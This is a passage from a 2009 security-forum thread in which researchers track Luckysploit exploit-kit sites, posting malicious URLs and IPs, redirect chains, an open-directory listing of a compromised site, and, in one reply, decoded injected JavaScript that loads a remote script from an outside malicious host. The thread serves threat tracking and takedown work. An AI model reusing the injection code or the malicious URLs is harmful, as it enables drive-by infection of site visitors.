Author Topic: another Luckysploit IP  (Read 46672 times)

0 Members and 1 Guest are viewing this topic.

May 26, 2009, 02:36:55 am
Reply #60

michajp

  • Full Member

  • Offline
  • ***

  • 59
Code: [Select]
hxxp://italycruiseegypt.com/s/in.cgi?3 
redir to:
hxxp://mainssrv.com/maco/?24ed4e573fdb875bf41973b1e40e2dc1

http://www.virustotal.com/analisis/667d08f74147c71f914b09fe4f6fe559078819e23eb0e8280e9580e07c89de99-1243305061

June 05, 2009, 08:48:24 am
Reply #61

michajp

  • Full Member

  • Offline
  • ***

  • 59
Code: [Select]
hxxp://myfucking-pussy.com/tyrek/?t=4

June 11, 2009, 06:35:39 am
Reply #62

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL

Code: [Select]
hxxp://originalsp.net/maoi/?bcba60e313aac523133482c9fe977c87
Wepawet

June 11, 2009, 12:50:57 pm
Reply #63

michajp

  • Full Member

  • Offline
  • ***

  • 59
Code: [Select]
hxxp://213.155.29.101/vsetakoe/?5bd6b116bfc711362f0779381b812ff4

June 13, 2009, 11:24:37 am
Reply #64

michajp

  • Full Member

  • Offline
  • ***

  • 59
Code: [Select]
hxxp://194.165.4.25/.luc/?f3d3b53b0ce86d0e3c8a48b36f12d42c/

July 24, 2009, 11:25:29 am
Reply #65

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
redirects to Luckysploit
Code: [Select]
calid.org/pro/in.cgi?2
Luckysploit
Code: [Select]
folemio.info/vsetakoe/?036e47146bcc7ea276d378224402fef7
Ruining the bad guy's day

August 09, 2009, 08:46:33 am
Reply #66

michajp

  • Full Member

  • Offline
  • ***

  • 59
Redirects to Luckysploit:
Code: [Select]
hxxp://mywebdesignonline.co.uk/SUD/
#Note: As you know, the Luckysploit code is usually only pushed once per IP. Above URL contains more nastyness on reload after the first push of the Luckysploit.

Luckysploit:
Code: [Select]
hxxp://122.70.145.157/.cua/?64bbea3228fa200efa17528148f6dddf

August 09, 2009, 08:54:45 am
Reply #67

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Interesting open dir at mywebdesignonline.co.uk too ;)

/edit

Code: [Select]
mywebdesignonline.co.uk/
mywebdesignonline.co.uk/?D=A
mywebdesignonline.co.uk/?M=A
mywebdesignonline.co.uk/?N=D
mywebdesignonline.co.uk/?S=A
mywebdesignonline.co.uk/_private/
mywebdesignonline.co.uk/_vti_bin/
mywebdesignonline.co.uk/_vti_cnf/
mywebdesignonline.co.uk/_vti_inf.html
mywebdesignonline.co.uk/_vti_log/
mywebdesignonline.co.uk/_vti_pvt/
mywebdesignonline.co.uk/_vti_txt/
mywebdesignonline.co.uk/1.html
mywebdesignonline.co.uk/1fitb9n/
mywebdesignonline.co.uk/35pj6wm/
mywebdesignonline.co.uk/4b167pk/
mywebdesignonline.co.uk/4r71dro/
mywebdesignonline.co.uk/6gi5gt/
mywebdesignonline.co.uk/71x8t0/
mywebdesignonline.co.uk/archive/
mywebdesignonline.co.uk/bangingdrum/
mywebdesignonline.co.uk/barimage.bmp
mywebdesignonline.co.uk/c00lttube/
mywebdesignonline.co.uk/calladriver/
mywebdesignonline.co.uk/campement/
mywebdesignonline.co.uk/cgi-bin/
mywebdesignonline.co.uk/children/
mywebdesignonline.co.uk/cpd.tar
mywebdesignonline.co.uk/cpd/
mywebdesignonline.co.uk/crm/
mywebdesignonline.co.uk/cycletop2bottom/
mywebdesignonline.co.uk/df2151/
mywebdesignonline.co.uk/dvd/
mywebdesignonline.co.uk/e0mbvt8/
mywebdesignonline.co.uk/ecommerce/
mywebdesignonline.co.uk/editable/
mywebdesignonline.co.uk/el5r43/
mywebdesignonline.co.uk/esj/
mywebdesignonline.co.uk/f4r0slk/
mywebdesignonline.co.uk/fh6px94/
mywebdesignonline.co.uk/findasolicitor/
mywebdesignonline.co.uk/foods.jpg
mywebdesignonline.co.uk/ftpviaphp.php
mywebdesignonline.co.uk/g3b0eyr/
mywebdesignonline.co.uk/gmnews/
mywebdesignonline.co.uk/googleb5ce9839f49a5a46.html
mywebdesignonline.co.uk/Holiday%20in%20Mauritius/
mywebdesignonline.co.uk/hxoos8d/
mywebdesignonline.co.uk/images/
mywebdesignonline.co.uk/imavkq/
mywebdesignonline.co.uk/info.php
mywebdesignonline.co.uk/jacapella/
mywebdesignonline.co.uk/jacappella/
mywebdesignonline.co.uk/joomla/
mywebdesignonline.co.uk/l9qmjo/
mywebdesignonline.co.uk/lf2fbz/
mywebdesignonline.co.uk/LT/
mywebdesignonline.co.uk/m9vytvi/
mywebdesignonline.co.uk/marthas/
mywebdesignonline.co.uk/Mick/
mywebdesignonline.co.uk/mtpa/
mywebdesignonline.co.uk/ogt1mg3/
mywebdesignonline.co.uk/oobfjit/
mywebdesignonline.co.uk/otu75rl/
mywebdesignonline.co.uk/oz0hmiq/
mywebdesignonline.co.uk/p1rihnu/
mywebdesignonline.co.uk/philip/
mywebdesignonline.co.uk/phpmyadmin/
mywebdesignonline.co.uk/pkp2xky/
mywebdesignonline.co.uk/plwork/
mywebdesignonline.co.uk/postinfo.html
mywebdesignonline.co.uk/qey83j/
mywebdesignonline.co.uk/qzacvv/
mywebdesignonline.co.uk/reg.html
mywebdesignonline.co.uk/robots.txt
mywebdesignonline.co.uk/ru.php
mywebdesignonline.co.uk/skjlg7w/
mywebdesignonline.co.uk/software/
mywebdesignonline.co.uk/SUD/
mywebdesignonline.co.uk/SWiSHmax_build_2004%5b1%5d.02.03.zip
mywebdesignonline.co.uk/t027pw/
mywebdesignonline.co.uk/talentbubble/
mywebdesignonline.co.uk/test.pl
mywebdesignonline.co.uk/thinkwell/
mywebdesignonline.co.uk/tools/
mywebdesignonline.co.uk/type23/
mywebdesignonline.co.uk/UserFiles.rar
mywebdesignonline.co.uk/userfiles/
mywebdesignonline.co.uk/vincent/
mywebdesignonline.co.uk/vishal/
mywebdesignonline.co.uk/wqtzkh/
mywebdesignonline.co.uk/wv8l2r/
mywebdesignonline.co.uk/wydy5n9/
mywebdesignonline.co.uk/x03e7f9/
mywebdesignonline.co.uk/xcbtalj/
mywebdesignonline.co.uk/z30em4/
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

August 09, 2009, 09:02:20 am
Reply #68

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Aww, it's our old friends, lol ....

/_vti_inf.html

JS in the above file decodes to;

Code: [Select]
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>");}
Could've sworn martuz.cn was already offline?

/edit

Just phoned EUKHost and was told to e-mail them as he can't deal with it till tomorrow (doesn't work Sundays apparently), so have fired an e-mail off.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

August 10, 2009, 08:07:00 pm
Reply #69

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
EUKHost have been in touch to tell me the owner has taken this domain offline.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 10, 2009, 08:37:39 am
Reply #70

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
Code: [Select]
94.75.216.181/dope/?d28e33f30013d909cd5db615562e2690
mylipc.com/hjjh/?7b0d33b2f1acb347aca386aa39ea3046
lingobest.com/vsetakoe/?21983bb0a2f5476c0c4aac31c7549f5b
firesaverbest.com/vsetakoe/?21983bb0a2f5476c0c4aac31c7549f5b
sebastienleabse.com/sou/?0ba3a2a491026e837182ada457aa4796
sebastienleabse.com/sou/?GO++lqB32ZMxU401Y/JSCNxtAN1fkbGHDq4Sz0pzRA== (pdf)
83.133.113.14/sou/?0ba3a2a491026e837182ada457aa4796
83.133.113.14/sou/?GO++lqB32ZMxU401Y/JSCNxtAN1fkbGHDq4Sz0pzRA== (pdf)

redirects to luckysploit:
85.10.221.162
Code: [Select]
mega-tracker.info/in.cgi?4Wepawet
Code: [Select]
wareshield.cn/jst.js
Wepawet

September 10, 2009, 12:25:55 pm
Reply #71

Serg

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 132
Hi 2 all
Im trying to analyse compromised web site
Code: [Select]
http://www.comanda-parfum.com/But i got some problems...
I got pdf sploits and malware but i got a problems with attached file. it was downloaded with following headers
Quote
Request-ID: 13

GET hxxp://212.174.200.114/.cuo/?Z2xd/S8ZgwjJgt+hbVMvAG0dhSABFtvNQO7IQrnip+o= HTTP/1.0
Host: 212.174.200.114
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: hxxp://212.174.200.114/.cuo/?934db28b45fa5186d3f0158e2f52ac83
Cookie: login=262bb56a675e3a0a21db4b558f7ce3a2
----
Answer-ID: 13

HTTP/1.0 200 OK
Date: Thu, 10 Sep 2009 06:39:51 GMT
Content-Type: text/html
X-Powered-By: PHP/5.1.6
Content-Encoding: gzip
Content-Length: 3988
X-Cache: MISS from chicken-machine
X-Cache-Lookup: MISS from chicken-machine:3128
Connection: keep-alive
Proxy-Connection: keep-alive

Under Gzip i suspect base64 encoding but what is inside? Any ideas? Please?

September 12, 2009, 02:23:35 pm
Reply #72

michajp

  • Full Member

  • Offline
  • ***

  • 59
Code: [Select]
hxxp://195.88.190.235/irri/?1bd3f86ca81712ec6a45340cbc884491

September 13, 2009, 01:39:57 am
Reply #73

michajp

  • Full Member

  • Offline
  • ***

  • 59
Code: [Select]
hxxp://locationlite.com/medow/?c42fb9fe6092adcbeb2bd40c788a50a2

September 18, 2009, 01:03:54 am
Reply #74

michajp

  • Full Member

  • Offline
  • ***

  • 59
This site contains iFramer (but gets cleaned and reinfected several times, it sems):

Code: [Select]
hxxp://0koryu0.easter.ne.jp/
http://wepawet.iseclab.org/view.php?hash=87191810fafdd9fe9bc88fac973d712c&t=1253235673&type=js

... which leads to Luckysploit site:

Code: [Select]
hxxp://212.174.200.114/.cuo/?fef5293d546b749a15d4c5c487f39109